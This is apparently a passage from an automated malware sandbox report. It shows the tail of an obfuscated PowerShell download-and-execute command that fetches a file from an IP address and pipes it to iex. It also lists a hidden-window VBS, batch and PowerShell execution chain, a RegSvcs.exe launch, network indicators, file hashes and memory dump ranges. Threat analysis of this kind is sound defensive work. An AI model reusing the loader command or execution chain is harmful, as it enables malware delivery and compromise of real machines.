IHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEydaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEySaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEytaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyraUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyiaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEynaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyg(''http://185.81.157.103/96/1.txt'')').Replace('aUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEy','')|iex

C:\Windows\System32\WScript.exe

C:\Windows\System32\WScript.exe "C:\Users\Public\hich.vbs"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Public\hich.bat" "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\hich.ps1'"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

Network

Country Destination Domain Proto
FR 185.81.157.103:80 185.81.157.103 tcp
US 8.8.8.8:53 103.157.81.185.in-addr.arpa udp
FR 185.81.157.103:80 185.81.157.103 tcp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 173.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 84.177.190.20.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 114.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 217.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 212.166.122.92.in-addr.arpa udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 187.178.17.96.in-addr.arpa udp
FR 185.81.157.183:9696 tcp
FR 185.81.157.183:9696 tcp
US 8.8.8.8:53 8.179.89.13.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_sfaqiojb.kai.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3004-8-0x000002C0AAF90000-0x000002C0AAFB2000-memory.dmp

memory/3004-13-0x00007FF844390000-0x00007FF844E51000-memory.dmp

memory/3004-14-0x000002C0C3430000-0x000002C0C3440000-memory.dmp

memory/3004-15-0x000002C0C3430000-0x000002C0C3440000-memory.dmp

memory/3004-19-0x000002C0C3430000-0x000002C0C3440000-memory.dmp

memory/3004-22-0x00007FF844390000-0x00007FF844E51000-memory.dmp

C:\Users\Public\hich.vbs

MD5 741b5b0a474f0e0cd28fd880f68723c0
SHA1 4de5489c4e56882514b3ab432048200eae65f90d
SHA256 f7edde68b4f783fe07a6cb0d12ffc76b04a9d81747cff32eed06c7caee5f7b23
SHA512 3783759fc24189ddb02ab9bd9888f4fe458ed378c6079d3fbd28af6fc34200d5f45ccd7e1c4beca90d9afe9d3bb29f7f20128c7b0a958c2c8a1a1ce8e9cc2f54

C:\Users\Public\hich.bat

MD5 6c8a34a94e068b809145df09acbe153c
SHA1 0ec5c6964c6ccc949af47297eb9794f8f1ee4724
SHA256 c683e03275b7f8d2031a42bdde2b95e2f46e8811004205a092e87de4bae5d003
SHA512 41431bb242a1b5848b8c4ab197dc6181db6f203bb26de68f492b99e876b63b73c6497fb996b0341045b1babd1c92be3346de116fa3699017d58e1d1199bfd805

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 2f57fde6b33e89a63cf0dfdd6e60a351
SHA1 445bf1b07223a04f8a159581a3d37d630273010f
SHA256 3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA512 42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

memory/4216-26-0x00007FF844390000-0x00007FF844E51000-memory.dmp

memory/4216-28-0x000001AAA3660000-0x000001AAA3670000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 b66db53846de4860ca72a3e59b38c544
SHA1 2202dc88e9cddea92df4f4e8d83930efd98c9c5a
SHA256 b1a00fcea37b39a5556eea46e50711f7713b72be077a73cb16515ca3538d6030
SHA512 72eff4ae1d541c4438d3cd85d2c1a8c933744b74c7a2a4830ffe398fee88f1a8c5b241d23e94bcdf43b4be28c2747b331a280a7dc67ab67d8e72c6569f016527

memory/4216-27-0x000001AAA3660000-0x000001AAA3670000-memory.dmp

C:\Users\Public\hich.ps1

MD5 8469f5b76df0f510fe02b1eab0f57226
SHA1 7ad6c79dc42aafd7b813353c8bdcb1204c376621
SHA256 a7247306f746e668360268472d038a8848d49645970ca7501d50cc0f700db279
SHA512 526280cb8cc15bae99a02c6f6a0ca26564f7eb657f610cd1579d953b584705b9bca8d0a7b6902e0bd0234912acdbb1b74bf4adf8aa7c6e49b6876b8ae82fe0b4

memory/4216-40-0x000001AAA3C40000-0x000001AAA3C74000-memory.dmp

memory/4216-41-0x000001AAA3660000-0x000001AAA3670000-memory.dmp

memory/1144-42-0x0000000000400000-0x0000000000416000-memory.dmp

memory/4216-44-0x00007FF844390000-0x00007FF844E51000-memory.dmp

memory/1144-45-0x0000000075250000-0x0000000075A00000-memory.dmp

memory/1144-46-0x00000000057E0000-0x00000000057F0000-memory.dmp

memory/1144-47-0x0000000005ED0000-0x0000000006474000-memory.dmp

memory/1144-48-0x0000000005B00000-0x0000000005B92000-memory.dmp

memory/1144-49-0x0000000005AF0000-0x0000000005AFA000-memory.dmp